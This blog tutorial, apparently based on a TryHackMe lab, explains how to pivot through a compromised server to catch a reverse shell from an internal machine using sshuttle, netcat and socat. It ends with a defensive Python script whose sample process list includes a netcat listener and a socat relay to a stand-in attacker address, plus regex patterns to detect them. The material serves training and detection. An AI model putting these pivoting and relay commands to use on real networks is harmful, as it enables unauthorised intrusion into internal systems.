In this blog, you will learn different ways to get a reverse shell from a vulnerable machine in an internal network by pivoting through an externally reachable compromised machine. This challenge is also part of the Wreath network from TryHackMe, which you can check out for further study.
How to get a reverse shell from an internal network?
First, let’s see what the issue is with getting a reverse shell from a vulnerable machine in an internal network.
The network is similar to the image shown below.
The issue here is that there isn’t any route for the attacker to reach the machines in the internal network, and vice versa.
The only option is to compromise the intermediate public-facing server and then use it in some way to reach a vulnerable machine in the internal network.
Let’s skip the part about compromising the server; from here we have two methods, depending on whether or not we have SSH access to the server.
Reverse shell with SSH access:
So if we have SSH credentials for the server (Linux only), we can use a tool called sshuttle, which uses an SSH connection to create a tunnelled proxy that acts like a new interface. In short, it simulates a VPN, allowing us to route our traffic through the proxy without the use of proxychains (or an equivalent).
With this, we can access any machine in the internal network with ease.
-r — remote server to which we have SSH access
-N — automatically detect the subnets to pivot into
10.200.48.0/24 — subnet to access through the pivot
If you are wondering whether we could use ping to check that we can reach a machine in the internal network, that is a great question.
The answer is no, because sshuttle proxies TCP sessions, not packets. For a more detailed explanation, refer to the documentation. Port scanning is not reliable either, since scanners send crafted packets to gather information about the target.
So to learn about our target inside the internal network we have to use a static binary of Nmap, or use tools already installed on the compromised server (the living-off-the-land technique).
Now to get the reverse shell we have 2 ways:
- Setting up a simple listener using a static netcat binary on the compromised server.
- Setting up a relay agent like socat to forward the shell back to our machine.
In the first method, we upload a static copy of netcat to the server and send a reverse shell payload with the IP and port of the netcat listener. This works because the server has a route to the internal network, meaning the two can communicate with one another. So now we get a shell from the vulnerable machine in the internal network on the compromised server.
We were able to reach the IP 10.200.48.150 because of the pivoting we did using sshuttle.
In the second method, instead of setting up a netcat listener on the server, we set up a relay agent using socat to forward the connection to our system.
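Both techniques above leave a telltale command line on the pivot host: a static netcat bound to a listening port, or a socat process that listens on one port and forwards to an outside address. As an added defender-side example (not part of the original post), the script below flags those patterns in a constructed sample of `ps -eo pid,user,args` output; the addresses and PIDs in the sample are made up.

```python
import re
import shlex
from typing import Dict, List

# Constructed sample of `ps -eo pid,user,args` output from a pivot host
# (not captured from a real system). The last two lines are the shapes
# left behind by a static netcat listener and a socat relay; 192.0.2.10
# stands in for the attacker's machine.
SAMPLE_PS = """\
  PID USER     COMMAND
    1 root     /sbin/init
  812 www-data /usr/sbin/apache2 -k start
 1507 www-data /tmp/nc -lvnp 4444
 1622 www-data socat TCP-LISTEN:4444,fork TCP:192.0.2.10:443
"""

# socat address syntax: TCP-LISTEN:<port> (or TCP-L / TCP4-LISTEN)
LISTEN_RE = re.compile(r"TCP4?-L(?:ISTEN)?:(\d+)", re.I)
# socat forward target: TCP:<host>:<port>
FORWARD_RE = re.compile(r"TCP4?:([\d.]+):(\d+)", re.I)


def find_pivot_listeners(ps_output: str) -> List[Dict[str, str]]:
    """Return one finding per netcat listener or socat relay in ps output."""
    findings: List[Dict[str, str]] = []
    for line in ps_output.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 2)           # pid, user, full command
        if len(parts) < 3:
            continue
        pid, user, cmd = parts
        argv = shlex.split(cmd)
        prog = argv[0].rsplit("/", 1)[-1]     # basename, e.g. /tmp/nc -> nc
        # netcat variants listening: any option cluster containing 'l'
        if prog in ("nc", "ncat", "netcat") and any(
                a.startswith("-") and "l" in a for a in argv[1:]):
            findings.append({"pid": pid, "user": user,
                             "kind": "netcat-listener", "cmd": cmd})
        elif prog == "socat":
            listen, fwd = LISTEN_RE.search(cmd), FORWARD_RE.search(cmd)
            if listen and fwd:  # listens locally and forwards elsewhere
                findings.append({"pid": pid, "user": user, "kind": "socat-relay",
                                 "listen_port": listen.group(1),
                                 "forward_to": f"{fwd.group(1)}:{fwd.group(2)}",
                                 "cmd": cmd})
    return findings


if __name__ == "__main__":
    for f in find_pivot_listeners(SAMPLE_PS):
        print(f)
```

Feed it the output of `ps -eo pid,user,args` from a real host to hunt for the same pattern; a web-server account such as www-data owning a listener is the part worth alerting on.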